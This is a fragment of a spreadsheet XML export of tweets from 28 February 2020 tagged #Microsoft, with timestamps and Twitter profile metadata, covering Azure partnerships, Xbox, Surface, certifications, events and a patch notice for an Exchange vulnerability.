    <t>.@AccentureSAs #PowerOf3 brings you the @SAP Embrace on @MicrosoftSA @Azure, to accelerate the digital transformation of #SAP to S/4HANA! Find out more: https://t.co/HVCVnnfenj #SAPWeek2020 #Microsoft #Azure https://t.co/miXNrehAuB</t>
  </si>
  <si>
    <t>Fri Feb 28 13:46:59 +0000 2020</t>
  </si>
  <si>
    <t>$SSFT news)) PAY ATTENTION
Sonasoft Awarded Coveted #Microsoft CSP Status and Achieves Nearly 600% Growth YoY $MSFT 
https://t.co/jrCfCth8EO
This award comes on the back of impressive growth in Sonasofts cloud services business, which has seen the growth of almost 600%  #AI</t>
  </si>
  <si>
    <t>Fri Feb 28 13:46:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft looking to merge the File Explorer with modern innovations https://t.co/blGIWWYj1A</t>
  </si>
  <si>
    <t>Fri Feb 28 13:45:08 +0000 2020</t>
  </si>
  <si>
    <t>#CoronaVirusUpdates 
#SanJose - We are already taking a $ wallop due to #coronavirus 
#Vacaville #UCDavis are an hour North -  2 the sick (now 33)
#FacebookGaming  #Microsoft &amp;amp; #EPIC have pulled out of #SanJoseConventionCenter 
#BTS has cancelled its concert at #SAPArena https://t.co/MHZ5jAADnX</t>
  </si>
  <si>
    <t>{'id': 26384952, 'id_str': '26384952', 'name': 'Trisha Cullen â¤ï¸ðŸ´ðŸŒˆðŸ‡ºðŸ‡¸', 'screen_name': 'trishacullen', 'location': 'Silicon Valley, CA', 'description': 'Producer, Business Owner #Resister #Empath #VoteBlueToSaveAmerica #SurvivingParent #FBR #Liberal #Democrat #Buttigieg #PeteButtigieg', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6165, 'friends_count': 6782, 'listed_count': 28, 'created_at': 'Wed Mar 25 01:04:17 +0000 2009', 'favourites_count': 23765, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24348,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'http://pbs.twimg.com/profile_images/1131172622048227328/qBtQ3_Le_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1131172622048227328/qBtQ3_Le_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26384952/1582894054',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</si>
  <si>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13:42:16 +0000 2020</t>
  </si>
  <si>
    <t>@Xbox this new menu was not the play can we get a revert to Xbox 360 style menu simple easy elegant #xbox #microsoft #gamer #gaming #game #twitch</t>
  </si>
  <si>
    <t>{'id': 1080597693574070273, 'id_str': '1080597693574070273', 'name': 'cloudyk1tten', 'screen_name': 'cloudyk1tten', 'location': '', 'description': 'Self Made Join the CatPack ðŸ± https://t.co/jErSnrsW0v           \n Use Creator Code: CLOUDYK1TTEN \nJoin discord server here: https://t.co/5b6H01uFqg', 'url': 'https://t.co/0pBJaK0F7A', 'entities': {'url': {'urls': [{'url': 'https://t.co/0pBJaK0F7A', 'expanded_url': 'http://www.cloudyk1tten.com', 'display_url': 'cloudyk1tten.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/jErSnrsW0v', 'expanded_url': 'http://twitch.tv/cloudyk1tten', 'display_url': 'twitch.tv/cloudyk1tten', 'indices': [29, 52]}, {'url': 'https://t.co/5b6H01uFqg', 'expanded_url': 'http://discord.gg/fGGEkwb', 'display_url': 'discord.gg/fGGEkwb', 'indices': [123, 146]}]}}, 'protected': False, 'followers_count': 529, 'friends_count': 219, 'listed_count': 0, 'created_at': 'Wed Jan 02 22:52:21 +0000 2019', 'favourites_count': 305, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 951, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218985146503876613/5_AETeiP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218985146503876613/5_AETeiP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1080597693574070273/1583450062',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</si>
  <si>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13:38:03 +0000 2020</t>
  </si>
  <si>
    <t>Something new today - in Edge Chromium! #google #edge #chromium #microsoft https://t.co/4ZAel7q2hp</t>
  </si>
  <si>
    <t>{'id': 14273934, 'id_str': '14273934', 'name': 'Venu Vedam', 'screen_name': 'vedam', 'location': 'Maidenhead, United Kingdom', 'description': "My tweets are my personal views... not my company's.\n\nCloud Solutions Architect @ Microsoft focussing on Blockchain, Writer, Daydreamer, Gadget Enthusiast.", 'url': 'https://t.co/E238SSOZu9', 'entities': {'url': {'urls': [{'url': 'https://t.co/E238SSOZu9', 'expanded_url': 'http://venu.in', 'display_url': 'venu.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 537, 'friends_count': 313, 'listed_count': 29, 'created_at': 'Tue Apr 01 11:14:05 +0000 2008', 'favourites_count': 175, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3275, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'AD001B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1111236014608187392/XUNxI42J_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111236014608187392/XUNxI42J_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14273934/1553774338', 'profile_link_color': '443D3E', 'profile_sidebar_border_color': 'F6F6F6', 'profile_sidebar_fill_color': 'CFCDCD', 'profile_text_color': '0F0708', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 13:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Moving its complete IT infrastructure to #Microsoft #cloud including #M365, #Azure and outsourcing #cloudmanagement to our experts enabled @conterra to strengthen and grow its business: https://t.co/WMO63LdFW9 
#happycustomer #casestudy #sam #digitaltransformation #Office365 https://t.co/NYT69XYWVJ</t>
  </si>
  <si>
    <t>{'id': 116633913, 'id_str': '116633913', 'name': 'SoftwareONE', 'screen_name': 'SoftwareONE', 'location': 'Stans, Switzerland', 'description': 'Leading global platform, solutions and services provider -  Empowering Companies to Transform | https://t.co/gERudAdRAS', 'url': 'https://t.co/EarWLFSOjN', 'entities': {'url': {'urls': [{'url': 'https://t.co/EarWLFSOjN', 'expanded_url': 'http://www.softwareone.com', 'display_url': 'softwareone.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/gERudAdRAS', 'expanded_url': 'https://www.softwareone.com/en/social-privacy', 'display_url': 'softwareone.com/en/social-privâ€¦', 'indices': [96, 119]}]}}, 'protected': False, 'followers_count': 3004, 'friends_count': 270, 'listed_count': 155, 'created_at': 'Tue Feb 23 04:07:38 +0000 2010', 'favourites_count': 5089, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5056, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '353F47', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1145437335368228864/QOZZzlQJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145437335368228864/QOZZzlQJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/116633913/1561928466', 'profile_link_color': 'D21034', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EDEDED', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 13:34:38 +0000 2020</t>
  </si>
  <si>
    <t>OS/2  a proprietary operating system, started in 1985 by... https://t.co/VhPSTsqfuo #os2 #ibm #microsoft</t>
  </si>
  <si>
    <t>{'id': 3402053932, 'id_str': '3402053932', 'name': 'ArchiveOS', 'screen_name': 'ArchiveOS', 'location': '', 'description': '', 'url': 'http://t.co/l5HHGDlBwn', 'entities': {'url': {'urls': [{'url': 'http://t.co/l5HHGDlBwn', 'expanded_url': 'http://archiveos.org', 'display_url': 'archiveos.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 22, 'listed_count': 2, 'created_at': 'Mon Aug 03 23:30:53 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 675,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'http://pbs.twimg.com/profile_images/628349908467122176/gANdbPCD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/628349908467122176/gANdbPCD_normal.png',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</si>
  <si>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13:34:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is slowly pulling the curtain back on its dual-screen Surface Duo and #Surface Neo. @TechCrunch #cdwsocial https://t.co/aYWtbUg6uf</t>
  </si>
  <si>
    <t>Fri Feb 28 13:32:09 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/soPRO2iruc</t>
  </si>
  <si>
    <t>{'id': 246947976, 'id_str': '246947976', 'name': 'Eduscape', 'screen_name': 'Eduscape', 'location': 'Montvale, NJ', 'description': 'To rethink learning by designing solutions that inspire inquiry, creativity &amp; collaboration. ðŸ‘¨\u200dðŸ«ðŸŒŸðŸ‘©\u200dðŸ« #RethinkLearning #EduscapeISTE #EduscapeSMS #ISTECert', 'url': 'https://t.co/j3IxRVs3mW', 'entities': {'url': {'urls': [{'url': 'https://t.co/j3IxRVs3mW', 'expanded_url': 'http://eduscape.com', 'display_url': 'eduscape.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3113, 'friends_count': 4097, 'listed_count': 49, 'created_at': 'Thu Feb 03 19:53:37 +0000 2011', 'favourites_count': 15148, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3276,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'http://pbs.twimg.com/profile_images/916333717760516097/haQ2H-J8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/916333717760516097/haQ2H-J8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246947976/1572970972', 'profile_link_color': '002D62',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</si>
  <si>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13:32:04 +0000 2020</t>
  </si>
  <si>
    <t>.@Atos announced that it has expanded its collaboration with #Microsoft to jointly address the fast-growing #SAPHANA market, targeting the most demanding customers, many of whom are running #missioncritical #SAP workloads.
https://t.co/Ay2FH1YlrJ
#BullSequana #MicrosoftAzure https://t.co/BOQyhQuYl1</t>
  </si>
  <si>
    <t>{'id': 36322817, 'id_str': '36322817', 'name': 'Vitorino Cruz', 'screen_name': 'vitorinocruz', 'location': 'MÃ¼nchen', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 286, 'listed_count': 1, 'created_at': 'Wed Apr 29 09:24:31 +0000 2009', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 695,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'http://pbs.twimg.com/profile_images/912001725380341760/lpL-c08L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/912001725380341760/lpL-c08L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36322817/1581369265',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</si>
  <si>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Feb 28 13:31:51 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft certifications MCSA, MCSD, MCSE to retire by end of june 2020, in favor of role based credentials https://t.co/Z9vdz0ES28</t>
  </si>
  <si>
    <t>{'id': 19712818, 'id_str': '19712818', 'name': 'Muhammad Ali', 'screen_name': 'sheikhali', 'location': 'Dubai, UAE', 'description': 'Tech Enthusiast, IT Manager, avid book reader with a keen eye to bring skills and personnel efficiencies. Work smart not hard, live and let live!', 'url': 'https://t.co/RhPvbV87Km', 'entities': {'url': {'urls': [{'url': 'https://t.co/RhPvbV87Km', 'expanded_url': 'https://medium.com/@sheikhali87', 'display_url': 'medium.com/@sheikhali87', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2075, 'friends_count': 1435, 'listed_count': 53, 'created_at': 'Thu Jan 29 14:27:26 +0000 2009', 'favourites_count': 361, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27669,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'http://pbs.twimg.com/profile_images/1075361922994835456/b9lMAiBX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075361922994835456/b9lMAiBX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19712818/1545727990',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</si>
  <si>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Fri Feb 28 13:30:32 +0000 2020</t>
  </si>
  <si>
    <t>@JanMulkens is a #Microsoft #MVP in #AI.
In his spare time, he is a speaker at conferences and user groups in Europe and he organizes 2 user groups, a conference in Belgium and one online.
We are excited for his talks at #MLCon 2020 in Munich:
&amp;gt;&amp;gt; https://t.co/CSEQf0SKUC https://t.co/a5DJoOFj07</t>
  </si>
  <si>
    <t>{'id': 879999619618484224, 'id_str': '879999619618484224', 'name': 'ML Conference', 'screen_name': 'mlconference', 'location': '', 'description': 'The Conference for Machine Learning Innovation\nComing up next: June 17 - 19, 2020 | Munich\n#MLconference', 'url': 'https://t.co/u2xcRnmbwr', 'entities': {'url': {'urls': [{'url': 'https://t.co/u2xcRnmbwr', 'expanded_url': 'https://mlconference.ai/', 'display_url': 'mlconference.ai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 572, 'friends_count': 203, 'listed_count': 20, 'created_at': 'Wed Jun 28 09:47:13 +0000 2017', 'favourites_count': 348, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1241,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'http://pbs.twimg.com/profile_images/1205057048490184704/Xy85zux6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205057048490184704/Xy85zux6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/879999619618484224/1581507951',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</si>
  <si>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13:30:16 +0000 2020</t>
  </si>
  <si>
    <t>CRN Australia reports on a big Department of Defence deal for #Microsoft #Azure that includes @Liquidware solutions https://t.co/Lw6OJIH4YV https://t.co/hGZNScQ6zM</t>
  </si>
  <si>
    <t>Fri Feb 28 13:30:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Exchange Servers are again the focus of attack. CVE-2020-0688, a vulnerability already resolved by the manufacturer, is a reminder to us all to identify #vulnerabilities quickly and patch efficiently.
Learn how we can help you: https://t.co/O4wETY4tat https://t.co/B425Ocd0GV</t>
  </si>
  <si>
    <t>{'id': 246764058, 'id_str': '246764058', 'name': 'Sapphire', 'screen_name': 'sapphiredotnet', 'location': 'UK Wide', 'description': 'Trusted Security Partner', 'url': 'http://t.co/ax7cFfKb', 'entities': {'url': {'urls': [{'url': 'http://t.co/ax7cFfKb', 'expanded_url': 'http://www.sapphire.net', 'display_url': 'sapphire.net', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 687, 'friends_count': 428, 'listed_count': 48, 'created_at': 'Thu Feb 03 12:25:51 +0000 2011', 'favourites_count': 718, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2083, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0068B3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/775803769254711296/1CXoRzkm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775803769254711296/1CXoRzkm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246764058/1565786155', 'profile_link_color': 'B1C5E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7D939C', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 13:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Growing up with two parents who are deaf, The dad who helped raine an engineer. #Microsoft.  #AIforAccessibility  #WomenInSTEM #WomenInScience  #technology #tech #education https://t.co/xr90gQOZgr</t>
  </si>
  <si>
    <t>Fri Feb 28 13:29:07 +0000 2020</t>
  </si>
  <si>
    <t>ARE YOU READY FOR @scottishsummit? 
Join @SolgariConverse in Room 6 at 14:30 on Saturday!
https://t.co/yxCZAWxhnl
#Microsoft #Scottishsummit #Solgari</t>
  </si>
  <si>
    <t>Fri Feb 28 13:29:05 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Let's Catch Up With the Student Who Hilariously Showed Up to Her Microsoft Job Interview a Full Month Early - TIME #xactplacements #microsoft #TIME https://t.co/jmvTVPAbz2 https://t.co/FQXnt6lxTA</t>
  </si>
  <si>
    <t>{'id': 27238412, 'id_str': '27238412', 'name': 'Xact Placements Ltd', 'screen_name': 'XactPlacements', 'location': 'Reading, Berkshire', 'description': 'IT, Marketing, Sales, Accountancy, Finance and Design vacancies across the UK', 'url': 'https://t.co/5lmLCyzAkb', 'entities': {'url': {'urls': [{'url': 'https://t.co/5lmLCyzAkb', 'expanded_url': 'http://www.xactplacements.co.uk', 'display_url': 'xactplacements.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 596, 'friends_count': 1678, 'listed_count': 21, 'created_at': 'Sat Mar 28 14:41:21 +0000 2009', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3207, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/959183950953533440/yNjiSFcH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959183950953533440/yNjiSFcH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27238412/1572976385', 'profile_link_color': '006072',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</si>
  <si>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Fri Feb 28 13:23:40 +0000 2020</t>
  </si>
  <si>
    <t>Patch now, Microsoft Exchange servers open to remote hacking due to major flaw https://t.co/tyAt7wlPCC
#microsoft #zerodayvulnerability #cybersecurity #patching</t>
  </si>
  <si>
    <t>{'id': 305496552, 'id_str': '305496552', 'name': 'Celerity Limited', 'screen_name': 'CelerityLimited', 'location': 'United Kingdom', 'description': 'Enabling IT Transformation For Business via Managed Services, Cloud and Traditional Infrastructure Solutions', 'url': 'http://t.co/ipx4lH2FNn', 'entities': {'url': {'urls': [{'url': 'http://t.co/ipx4lH2FNn', 'expanded_url': 'http://www.celerity-uk.com', 'display_url': 'celerity-uk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1202, 'friends_count': 1201, 'listed_count': 64, 'created_at': 'Thu May 26 09:47:33 +0000 2011', 'favourites_count': 810, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5048,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'http://pbs.twimg.com/profile_images/1229441051322191873/6aEPlKhH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229441051322191873/6aEPlKhH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/305496552/1581956565',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</si>
  <si>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Feb 28 13:16:22 +0000 2020</t>
  </si>
  <si>
    <t>Hello #Microsoft investment in a #DataCentre in #Indonesia. #CloudComputing #DataCenter #AsiaPacific #ASEAN https://t.co/a1qQtydQIB https://t.co/jqEyVvIsqa</t>
  </si>
  <si>
    <t>{'id': 1131165073, 'id_str': '1131165073', 'name': 'Asia Cloud Comp Assn', 'screen_name': 'accacloud', 'location': 'Asia', 'description': "Asia Cloud Computing Association: voice of Asia's #cloud ecosystem. Tweeted by Exec Director Ms Lim May-Ann. Join our LinkedIn group at https://t.co/qsG52484F8", 'url': 'http://t.co/EtJPxhku4p', 'entities': {'url': {'urls': [{'url': 'http://t.co/EtJPxhku4p', 'expanded_url': 'http://www.asiacloudcomputing.org', 'display_url': 'asiacloudcomputing.org', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/qsG52484F8', 'expanded_url': 'http://is.gd/accacloud', 'display_url': 'is.gd/accacloud', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 556, 'friends_count': 195, 'listed_count': 35, 'created_at': 'Tue Jan 29 14:15:45 +0000 2013', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 776,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'http://pbs.twimg.com/profile_images/432957498610290688/cHwY5ZvD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/432957498610290688/cHwY5ZvD_normal.png',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</si>
  <si>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13:15:39 +0000 2020</t>
  </si>
  <si>
    <t>@iEx_ec @jwolpert @Consensys @EntEthAlliance C'mon guys. Don't be shy!
Trusted computing with @Microsoft @jpmorgan @bancosantander @web3labs #London 
$RLC #computing #microsoft #JPMorgan $ETH #mainnet</t>
  </si>
  <si>
    <t>{'id': 947119198408454146, 'id_str': '947119198408454146', 'name': 'Power5S', 'screen_name': 'Doru5S', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 142, 'listed_count': 0, 'created_at': 'Sat Dec 30 14:56:28 +0000 2017', 'favourites_count': 633, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 470,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</si>
  <si>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Feb 28 13:15:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft looks to give Yammer a new lease of life; can it? https://t.co/OSofZlxTHb
via @Computerworld #computing #microsoft https://t.co/YQ3nxmCtF1</t>
  </si>
  <si>
    <t>Fri Feb 28 13:15:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Confirms Serious Surface Laptop Problem  Forbes https://t.co/OSNN2DNOWA #TechJunkieNews https://t.co/CEJDUH5sDq</t>
  </si>
  <si>
    <t>Fri Feb 28 13:12:55 +0000 2020</t>
  </si>
  <si>
    <t>24*7/365 days, Instant #MicrosoftSupport for. all types of computer issues.Install/uninstall, configure, error files, PC maintenance, lost files, Complete #Microsoft #Helpline, resolve all issues, Call our #Australia Toll-free 1800-517-221. https://t.co/av73ZtZXAH</t>
  </si>
  <si>
    <t>Fri Feb 28 13:12:24 +0000 2020</t>
  </si>
  <si>
    <t>Financial Cashflow Forecast https://t.co/iQnNXzF7J8
#doc #document #template #Microsoft #picture #new #simple #easy #register #online #excel #PowerPoint #follow #trending #startups</t>
  </si>
  <si>
    <t>Fri Feb 28 13:11:13 +0000 2020</t>
  </si>
  <si>
    <t>@jimcramer Im 38 and have been Investing since I was 20. Im loooong. Im buying #Microsoft, #PayPal, #Apple this morning. #getrichcarefully</t>
  </si>
  <si>
    <t>{'id': 2361329136, 'id_str': '2361329136', 'name': 'pat neistat', 'screen_name': 'patneistat', 'location': '', 'description': 'Co-Owner of Notclub33', 'url': 'https://t.co/KMlX3edHZk', 'entities': {'url': {'urls': [{'url': 'https://t.co/KMlX3edHZk', 'expanded_url': 'http://www.notclub33.com', 'display_url': 'notclub33.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 71, 'listed_count': 0, 'created_at': 'Tue Feb 25 16:24:16 +0000 2014', 'favourites_count': 1354, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 689,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'http://pbs.twimg.com/profile_images/896374510563315713/7I2roTwu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/896374510563315713/7I2roTwu_normal.jpg',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</si>
  <si>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13:10:44 +0000 2020</t>
  </si>
  <si>
    <t>Vatican backs AI regulations to protect people - signature of #RomeCallforAIEthics by #Vatican #Microsoft #IBM #FAO #EuropeanParliament + #ItalianGovernment  #renAIssance https://t.co/oNgsOqADQQ</t>
  </si>
  <si>
    <t>{'id': 46742136, 'id_str': '46742136', 'name': 'Eimear FarrellðŸ¦‹', 'screen_name': 'eimearfarrell', 'location': 'ðŸ‡®ðŸ‡ª ðŸ‡¨ðŸ‡­ ðŸ‡©ðŸ‡ª', 'description': "All things #AI \n'The world is endlessly fertile in its yield of sobering wrenching clarifying contexts for thinking about the idea of human rights'", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1690, 'friends_count': 4994, 'listed_count': 176, 'created_at': 'Fri Jun 12 20:34:59 +0000 2009', 'favourites_count': 2962, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11822, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7A7080', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234612708626108416/a27U_eng_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234612708626108416/a27U_eng_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/46742136/1504268530', 'profile_link_color': 'B922C7', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DAECF4', 'profile_text_color': '663B12', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 13:10:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 &amp;amp; SharePoint #PnPWeekly - Episode 72 #technology #MicrosoftSharepoint https://t.co/fXMfOQzhJh #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Super Excited to help out with the  #wqed  #digigirlz event at the #microsoft #pittsburgh!! #alwayslearning  #datageek</t>
  </si>
  <si>
    <t>Fri Feb 28 13:10:12 +0000 2020</t>
  </si>
  <si>
    <t>Did you ever think you'd see Nick Wallace, Commercial Director at @Azure on stage at #Oracle #OpenWorld? 
Nick was discussing compatibility between various softwares. #OOWLON  #Microsoft #tech #technology #talenterprize https://t.co/KamFjUWMx6</t>
  </si>
  <si>
    <t>Fri Feb 28 13:09:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 &amp;amp; SharePoint PnP Weekly - Episode 72 https://t.co/2NQxqJ6oI1 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 13:08:47 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft lied about cloud security service, $43 billion lawsuit alleges:
https://t.co/Rb79B7LTzc 
#us #usa #microsoft #cybersecurity #data #law https://t.co/HyisIKjYal</t>
  </si>
  <si>
    <t>{'id': 948590311378432000, 'id_str': '948590311378432000', 'name': 'Global Data Review', 'screen_name': 'GDR_alerts', 'location': 'London, United Kingdom ', 'description': 'The need-to-know news and analysis for lawyers working in the digital economy, helping companies monetise, trade and protect their data and comply with the law.', 'url': 'https://t.co/PNNqgif7E3', 'entities': {'url': {'urls': [{'url': 'https://t.co/PNNqgif7E3', 'expanded_url': 'http://www.globaldatareview.com', 'display_url': 'globaldatareview.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 395, 'friends_count': 430, 'listed_count': 8, 'created_at': 'Wed Jan 03 16:22:09 +0000 2018', 'favourites_count': 185, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 775,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'http://pbs.twimg.com/profile_images/971692424828522496/-eqlEB8d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/971692424828522496/-eqlEB8d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948590311378432000/1539772556',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</si>
  <si>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13:07:19 +0000 2020</t>
  </si>
  <si>
    <t>If Men Take Selfies With The Same Faces Females Make!!! #Mixerstreamer #MixerForLife #WatchMixer #ContentCreator #Gamer #Gaming #Bronx #NYC  #Xbox #XboxOne #XboxOneX #Microsoft #PS4 #Playstation4 #Sony #pc #microsoft #BloodPack #BPG #BloodPackGaming #Family @watchmixer @NZXT https://t.co/ake5LYG8M7</t>
  </si>
  <si>
    <t>Fri Feb 28 13:06:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft looks to give #Yammer a new lease of life; can it?
The new Yammer will focus on:
#communities
#knowledge
#engagement 
#YearOfYammer #Office365 #ESN #EnterpriseSocialNetwork #MicrosoftTeams #Slack #Outlook #SharePoint #sharing #workplace    
https://t.co/GkwWDjMCTT</t>
  </si>
  <si>
